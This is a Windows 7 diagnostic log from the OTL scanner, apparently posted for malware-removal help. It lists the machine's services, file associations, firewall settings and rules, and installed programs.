SRV:64bit: - [2010/11/20 22:24:17 | 000,344,064 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)

SRV:64bit: - [2010/11/20 22:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)

SRV:64bit: - [2010/11/20 22:24:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)

SRV:64bit: - [2014/04/11 21:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)

SRV:64bit: - [2009/07/13 20:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)

SRV:64bit: - [2010/11/20 22:23:48 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)

SRV:64bit: - [2010/11/20 22:23:55 | 000,370,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)

SRV - [2010/11/20 22:24:03 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)

No service found with a name of slsvc

SRV:64bit: - [2010/11/20 22:24:16 | 001,110,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)

SRV:64bit: - [2010/11/20 22:24:32 | 000,316,928 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)

SRV - [2010/11/20 22:24:00 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)

SRV:64bit: - [2009/07/13 20:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)

SRV:64bit: - [2012/05/01 00:40:20 | 000,209,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)

SRV:64bit: - [2010/11/20 22:23:55 | 001,600,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)

SRV:64bit: - [2010/11/20 22:24:32 | 000,679,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)

SRV:64bit: - [2010/11/20 22:24:32 | 000,679,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)

SRV:64bit: - [2010/11/20 22:25:06 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)

SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)

SRV:64bit: - [2010/11/20 22:23:55 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)

SRV:64bit: - [2010/11/20 22:24:28 | 000,828,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)

SRV:64bit: - [2010/11/20 22:24:48 | 000,580,096 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)

SRV:64bit: - [2010/11/20 22:24:15 | 000,128,000 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\windows\SysNative\msiexec.exe -- (msiserver)

SRV - [2010/11/20 22:24:28 | 000,073,216 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\windows\SysWow64\msiexec.exe -- (msiserver)

SRV:64bit: - [2009/07/13 20:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)

SRV:64bit: - [2014/05/14 11:23:46 | 002,477,536 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)

SRV:64bit: - [2010/11/20 22:24:09 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)

SRV:64bit: - [2009/07/13 20:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)

SRV:64bit: - [2010/11/20 22:24:32 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

< End of report >


extras.txt

OTL Extras logfile created on: 10/29/2014 8:09:31 AM - Run 1

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ADH.Heathman-PC\Desktop

64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.10.9200.17116)

Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

7.91 Gb Total Physical Memory | 4.75 Gb Available Physical Memory | 60.09% Memory free

15.82 Gb Paging File | 12.42 Gb Available in Paging File | 78.55% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files (x86)

Drive C: | 449.23 Gb Total Space | 295.86 Gb Free Space | 65.86% Space Free | Partition Type: NTFS

Computer Name: HEATHMAN-PC | User Name: ADH | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans

Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Extra Registry (SafeList) ==========

========== File Associations ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)

.url[@ = InternetShortcut] -- C:\windows\SysNative\rundll32.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

.cpl [@ = cplfile] -- C:\windows\SysWow64\control.exe (Microsoft Corporation)

.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)

========== Shell Spawning ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]

batfile [open] -- "%1" %*

cmdfile [open] -- "%1" %*

comfile [open] -- "%1" %*

exefile [open] -- "%1" %*

helpfile [open] -- Reg Error: Key error.

htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

htmlfile [print] -- rundll32.exe %SystemRoot%\system32\mshtml.dll,PrintHTML "%1" (Microsoft Corporation)

http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)

InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)

InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)

piffile [open] -- "%1" %*

regfile [merge] -- Reg Error: Key error.

scrfile [config] -- "%1"

scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l

scrfile [open] -- "%1" /S

txtfile [edit] -- Reg Error: Key error.

Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1

Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)

Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Folder [explore] -- Reg Error: Value error.

Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]

batfile [open] -- "%1" %*

cmdfile [open] -- "%1" %*

comfile [open] -- "%1" %*

cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)

exefile [open] -- "%1" %*

helpfile [open] -- Reg Error: Key error.

htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)

piffile [open] -- "%1" %*

regfile [merge] -- Reg Error: Key error.

scrfile [config] -- "%1"

scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l

scrfile [open] -- "%1" /S

txtfile [edit] -- Reg Error: Key error.

Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1

Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)

Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Folder [explore] -- Reg Error: Value error.

Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.

========== Security Center Settings ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

"cval" = 1

"FirewallDisableNotify" = 0

"AntiVirusDisableNotify" = 0

"UpdatesDisableNotify" = 0

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

"VistaSp1" = 28 4D B2 76 41 04 CA 01 [binary data]

"AntiVirusOverride" = 0

"AntiSpywareOverride" = 0

"FirewallOverride" = 0

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

========== System Restore Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]

"DisableSR" = 0

========== Firewall Settings ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

"EnableFirewall" = 1

"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]

"EnableFirewall" = 1

"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]

"EnableFirewall" = 1

"DisableNotifications" = 0

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]

========== Vista Active Open Ports Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

"{0109A1D6-A139-44FA-9627-DD2221EAE360}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |

"{05EB8B0D-5F5B-4F39-92FB-25008FEC74FA}" = lport=139 | protocol=6 | dir=in | app=system |

"{06FDC3A8-FAE2-4686-A4AC-E721B246CDB9}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{0E0269A8-FFDB-476E-8DE9-E07AD1242558}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{14C1AEDE-09F3-4486-8A01-5D9500DC0CB3}" = lport=10243 | protocol=6 | dir=in | app=system |

"{32F67FFF-6E46-49EF-A86D-09E0673E5601}" = lport=5353 | protocol=17 | dir=in | app=c:\program files (x86)\google\chrome\application\chrome.exe |

"{3382BE6E-1BCC-48D0-BA37-E4C54C30E33A}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{3BA14E21-EB20-4B5A-BE12-55A69558C189}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{3F8DD20C-B58E-4228-B191-288661F3A923}" = lport=6004 | protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\outlook.exe |

"{46554E25-9EF5-4BDA-A35C-565394AAFD53}" = lport=10255 | protocol=6 | dir=in | name=tmc_plugin_port |

"{50145AEF-8061-400C-99B0-09F89C5EF9F4}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{5450716C-A89B-49DA-A7EB-39BCE09ABC90}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) |

"{58AC6BF6-BEC9-47EC-A296-3F449941171B}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{5908E83F-A67E-4D95-B275-37A845D908C0}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) |

"{5E56781C-F65E-457B-AB2C-134E9FE2807F}" = lport=137 | protocol=17 | dir=in | app=system |

"{651F64D6-6998-4735-BE12-5E9E29C1C94E}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |

"{7154AFE0-4FD4-499D-A9B2-522EF2D3EE72}" = rport=445 | protocol=6 | dir=out | app=system |

"{76FDD123-1311-4F98-90C5-CB2D8EF323F3}" = rport=80 | protocol=6 | dir=out | app=c:\program files (x86)\common files\intuit\update service v4\intuitupdateservice.exe |

"{8A575D7A-C3F1-4176-86B7-548B0CC7FF82}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |

"{93231470-066D-4246-88E6-08BDB4824C4E}" = rport=80 | protocol=6 | dir=out | app=c:\program files (x86)\common files\intuit\update service v4\intuitupdater.exe |

"{97C2C3C0-9D0E-4BE5-96FA-2FA944FE271B}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{9AF4D293-69CF-4628-8714-11B1943BA6E8}" = rport=139 | protocol=6 | dir=out | app=system |

"{9C41DD2F-C2BC-456D-8294-3220B7DC7651}" = lport=445 | protocol=6 | dir=in | app=system |

"{A2E1B399-4404-4C80-82D7-AF0E43822FA0}" = rport=80 | protocol=6 | dir=out | app=c:\program files (x86)\common files\intuit\update service\intuitupdateservice.exe |

"{B3E2C739-16D9-4610-8627-98D7993195A3}" = lport=138 | protocol=17 | dir=in | app=system |

"{CE54D053-8A07-41BD-BAE7-933AB74FA0AF}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |

"{D048C981-08FC-4E8B-856D-004A193E4E25}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{D358AB8B-951D-4E9B-B17B-FA2ED63E0EAD}" = rport=138 | protocol=17 | dir=out | app=system |

"{DDBB8F75-C211-4435-BF17-3D71F84FFA30}" = rport=10243 | protocol=6 | dir=out | app=system |

"{E3CB2CF7-2603-4C2E-B5FD-6C1BEDAE8E91}" = rport=137 | protocol=17 | dir=out | app=system |

"{F21A9E64-5E87-41D9-B47F-01A2F2C1A608}" = lport=2869 | protocol=6 | dir=in | app=system |

"{F3E99991-E77C-406F-AF6E-F29BE340E0BE}" = rport=80 | protocol=6 | dir=out | app=c:\program files (x86)\common files\intuit\update service\intuitupdater.exe |

========== Vista Active Application Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

"{0A522226-8256-4C37-93C0-FEC1B4842296}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |

"{0E4FF8F8-AEA0-4714-80C8-9AC1136C5C0F}" = dir=out | app=c:\program files (x86)\motorola mobility\motocast\bin\motocast-thumbnailer.exe |

"{14F238E0-5D87-457F-9A4F-08BF95E2FCFC}" = dir=in | app=c:\program files (x86)\windows live\messenger\msnmsgr.exe |

"{1853D9A6-6DFB-43CC-8DE3-C75043064EA3}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |

"{1CF5F9E5-ED65-4545-BFD2-B2ABA62AEF72}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe |

"{1D49305B-2D19-4E31-80EF-B572589E6BCD}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |

"{29167C02-9405-47EB-819A-BE7508043743}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{292894D7-4F8E-4D72-A134-CBA957D06A22}" = protocol=6 | dir=out | app=system |

"{2AA03B56-07BB-4F21-B511-A36F1D92B386}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |

"{2F6B9536-141A-4D82-B12A-CAA2E93220B7}" = dir=in | app=c:\program files (x86)\motorola mobility\motocast\motocast.exe |

"{3516CBCA-DF10-4256-B901-52C4906A15DF}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{3A8AFAE8-A854-4729-AADC-E9C5CD73D10E}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |

"{3E7A1A0A-2B0A-4A75-96AC-76DDBECB09CC}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{4467AA00-CFC2-415C-8094-9497FCD16BEE}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |

"{4B9D8158-0852-4A64-AEEC-B85E55BFD4EF}" = dir=in | app=c:\program files\intel\wifi\bin\pandhcpdns.exe |

"{4DACCDF8-7633-4072-BA1E-B69021568E65}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |

"{53C30A38-375B-4EAC-A4FC-7255FEE57685}" = dir=in | app=c:\program files (x86)\windows live\mesh\moe.exe |

"{5440342B-932A-45EF-A606-73C0439AEF16}" = dir=in | app=c:\program files (x86)\intel corporation\intel widi\widiapp.exe |

"{5D8D9F4A-DC57-4968-A5A8-FCA0010BD9E7}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |

"{6B489BFB-2B3D-43E4-9C30-5CC0328051BD}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |

"{76B61BB7-45BF-4C15-9F10-4E591FC9B5F4}" = dir=in | app=c:\program files (x86)\motorola mobility\motocast\bin\motocast-thumbnailer.exe |

"{7A1E7E5B-0CA3-463C-9268-D5E31821772C}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |

"{7A2BA6C0-2376-4A9F-89FA-B6492AAD2397}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |

"{837266CD-A281-430A-888A-BCB1007BC250}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |

"{8A4838BE-54E4-44F4-B066-9AC7B34D687A}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |

"{95694C8E-3035-410D-8CA0-CCAFF1942A76}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{A333A514-2A16-4C9E-9E6D-A0F46559A2D4}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe |

"{A660A08F-92AE-4906-AA40-BC8CB7C74693}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |

"{AC0D235D-8EA7-4EA9-A8BE-9CA2F3DE298E}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |

"{ACBDAE9B-7F03-4C3B-8963-2DC492FAA047}" = dir=out | app=c:\program files (x86)\motorola mobility\motocast\motocast.exe |

"{C872428A-EEC0-4859-981B-44A990B4821D}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe |

"{CD04F4DD-A7DF-4310-A92C-25336277B19F}" = dir=in | app=c:\program files (x86)\laplink\pcmover\pcmover.exe |

"{D852537B-5FFA-44C3-8F0E-D8D771158A50}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |

"{E896EF2C-18C5-4071-B770-44465D78ED2F}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe |

"{EBEB8A1A-488D-4789-BBAD-32F0C3F72577}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |

"{ECDB25FF-0B32-4A84-84F2-88BF932FBDAF}" = dir=in | app=c:\program files (x86)\motorola media link\lite\mml.exe |

"{F0532A61-8055-498F-9B30-51ED5A015797}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |

========== HKEY_LOCAL_MACHINE Uninstall List ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"{066CFFF8-12BF-4390-A673-75F95EFF188E}" = TOSHIBA Value Added Package

"{071c9b48-7c32-4621-a0ac-3f809523288f}" = Microsoft Visual C++ 2005 Redistributable (x64)

"{180C8888-50F1-426B-A9DC-AB83A1989C65}" = Windows Live Language Selector

"{1ACC8FFB-9D84-4C05-A4DE-D28A9BC91698}" = Windows Live ID Sign-in Assistant

"{1C8C049A-145F-4A6E-8290-B5C245EBE39D}" = TOSHIBA Bulletin Board

"{24811C12-F4A9-4D0F-8494-A7B8FE46123C}" = TOSHIBA ReelTime

"{27C3DB42-A9C1-4B44-A164-93849D160D12}" = TOSHIBA Blu-ray Disc Player

"{28EF7372-9087-4AC3-9B9F-D9751FCDF830}" = Intel® Wireless Display

"{350AA351-21FA-3270-8B7A-835434E766AD}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022

"{3C41721F-AF0F-4086-AA1C-4C7F29076228}" = Intel® PROSet/Wireless WiFi Software

"{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148

"{5DA0E02F-970B-424B-BF41-513A5018E4C0}" = TOSHIBA Disc Creator

"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161

"{656DEEDE-F6AC-47CA-A568-A1B4E34B5760}" = Windows Live Remote Service Resources

"{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}" = Apple Mobile Device Support

"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour

"{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}" = Microsoft Visual C++ 2005 Redistributable (x64)

"{759E6A2F-1F01-45EF-A0C4-22F1B56CB975}" = Motorola Mobile Drivers Installation 6.3.0

"{77DE5105-D05E-448C-96CB-7FA381903753}" = iTunes

"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1

"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17

"{847B0532-55E3-4AAF-8D7B-E3A1A7CD17E5}" = Windows Live Remote Client Resources

"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight

"{90140000-002A-0000-1000-0000000FF1CE}" = Microsoft Office Office 64-bit Components 2010

"{90140000-002A-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit MUI (English) 2010

"{90140000-0116-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010

"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1

"{94A90C69-71C1-470A-88F5-AA47ECC96B40}" = TOSHIBA HDD Protection

"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting

"{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}" = TOSHIBA PC Health Monitor

"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)

"{B2FE1952-0186-46c3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = NVIDIA Control Panel 296.10

"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Graphics Driver 296.10

"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB" = NVIDIA 3D Vision Controller Driver 296.10

"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Optimus" = NVIDIA Optimus 1.7.11

"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX" = NVIDIA PhysX System Software 9.12.0213

"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application

"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NVIDIA.Update" = NVIDIA Update Components

"{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}" = PlayReady PC Runtime amd64

"{C2F94B5E-201A-4754-8F2F-4395E1D90DA3}" = TOSHIBA eco Utility

"{D4322448-B6AF-4316-B859-D8A0E84DCB38}" = TOSHIBA HDD/SSD Alert

"{DA54F80E-261C-41A2-A855-549A144F2F59}" = Windows Live MIME IFilter

"{DF6D988A-EEA0-4277-AAB8-158E086E439B}" = Windows Live Remote Client

"{E02A6548-6FDE-40E2-8ED9-119D7D7E641F}" = Windows Live Remote Service

"{E2C24FE1-C6BB-4A4B-8B7F-BF2521DEB91E}" = Share64

"{F67FA545-D8E5-4209-86B1-AEE045D1003F}" = TOSHIBA Face Recognition

"ProInst" = Intel PROSet Wireless

"SynTPDeinstKey" = Synaptics Pointing Device Driver

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"_{E185BD5C-0E10-479F-AF44-63D3A068446A}" = Corel Digital Studio SE

"{05BDC796-3451-4F81-B91D-E98F7ADA76C2}" = TurboTax 2010 WinPerTaxSupport

"{066CFFF8-12BF-4390-A673-75F95EFF188E}" = TOSHIBA Value Added Package

"{0A7DD94B-B746-4FB0-8688-8598C22793A0}" = TurboTax 2013 WinPerFedFormset

"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer

"{0D557AE9-1484-4E22-978F-A372EE04F16F}" = TurboTax 2010 wmoiper

"{0D795777-9D60-4692-8386-F2B3F2B5E5BF}" = Label@Once 1.0

"{12688FD7-CB92-4A5B-BEE4-5C8E0574434F}" = Utility Common Driver

"{18455581-E099-4BA8-BC6B-F34B2F06600C}" = Google Toolbar for Internet Explorer

"{196467F1-C11F-4F76-858B-5812ADC83B94}" = MSXML 4.0 SP3 Parser

"{196BB40D-1578-3D01-B289-BEFC77A11A1E}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319

"{19BA08F7-C728-469C-8A35-BFBD3633BE08}" = Windows Live Movie Maker

"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

"{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}" = Junk Mail filter update

"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions

"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" = Google Toolbar for Internet Explorer

"{246BBF3E-3CB6-4269-9728-904C54CC1D4A}" = Jewel Quest Mysteries Curse of the Emerald Tear

"{26604C7E-A313-4D12-867F-7C6E7820BE4C}" = JMicron Flash Media Controller Driver

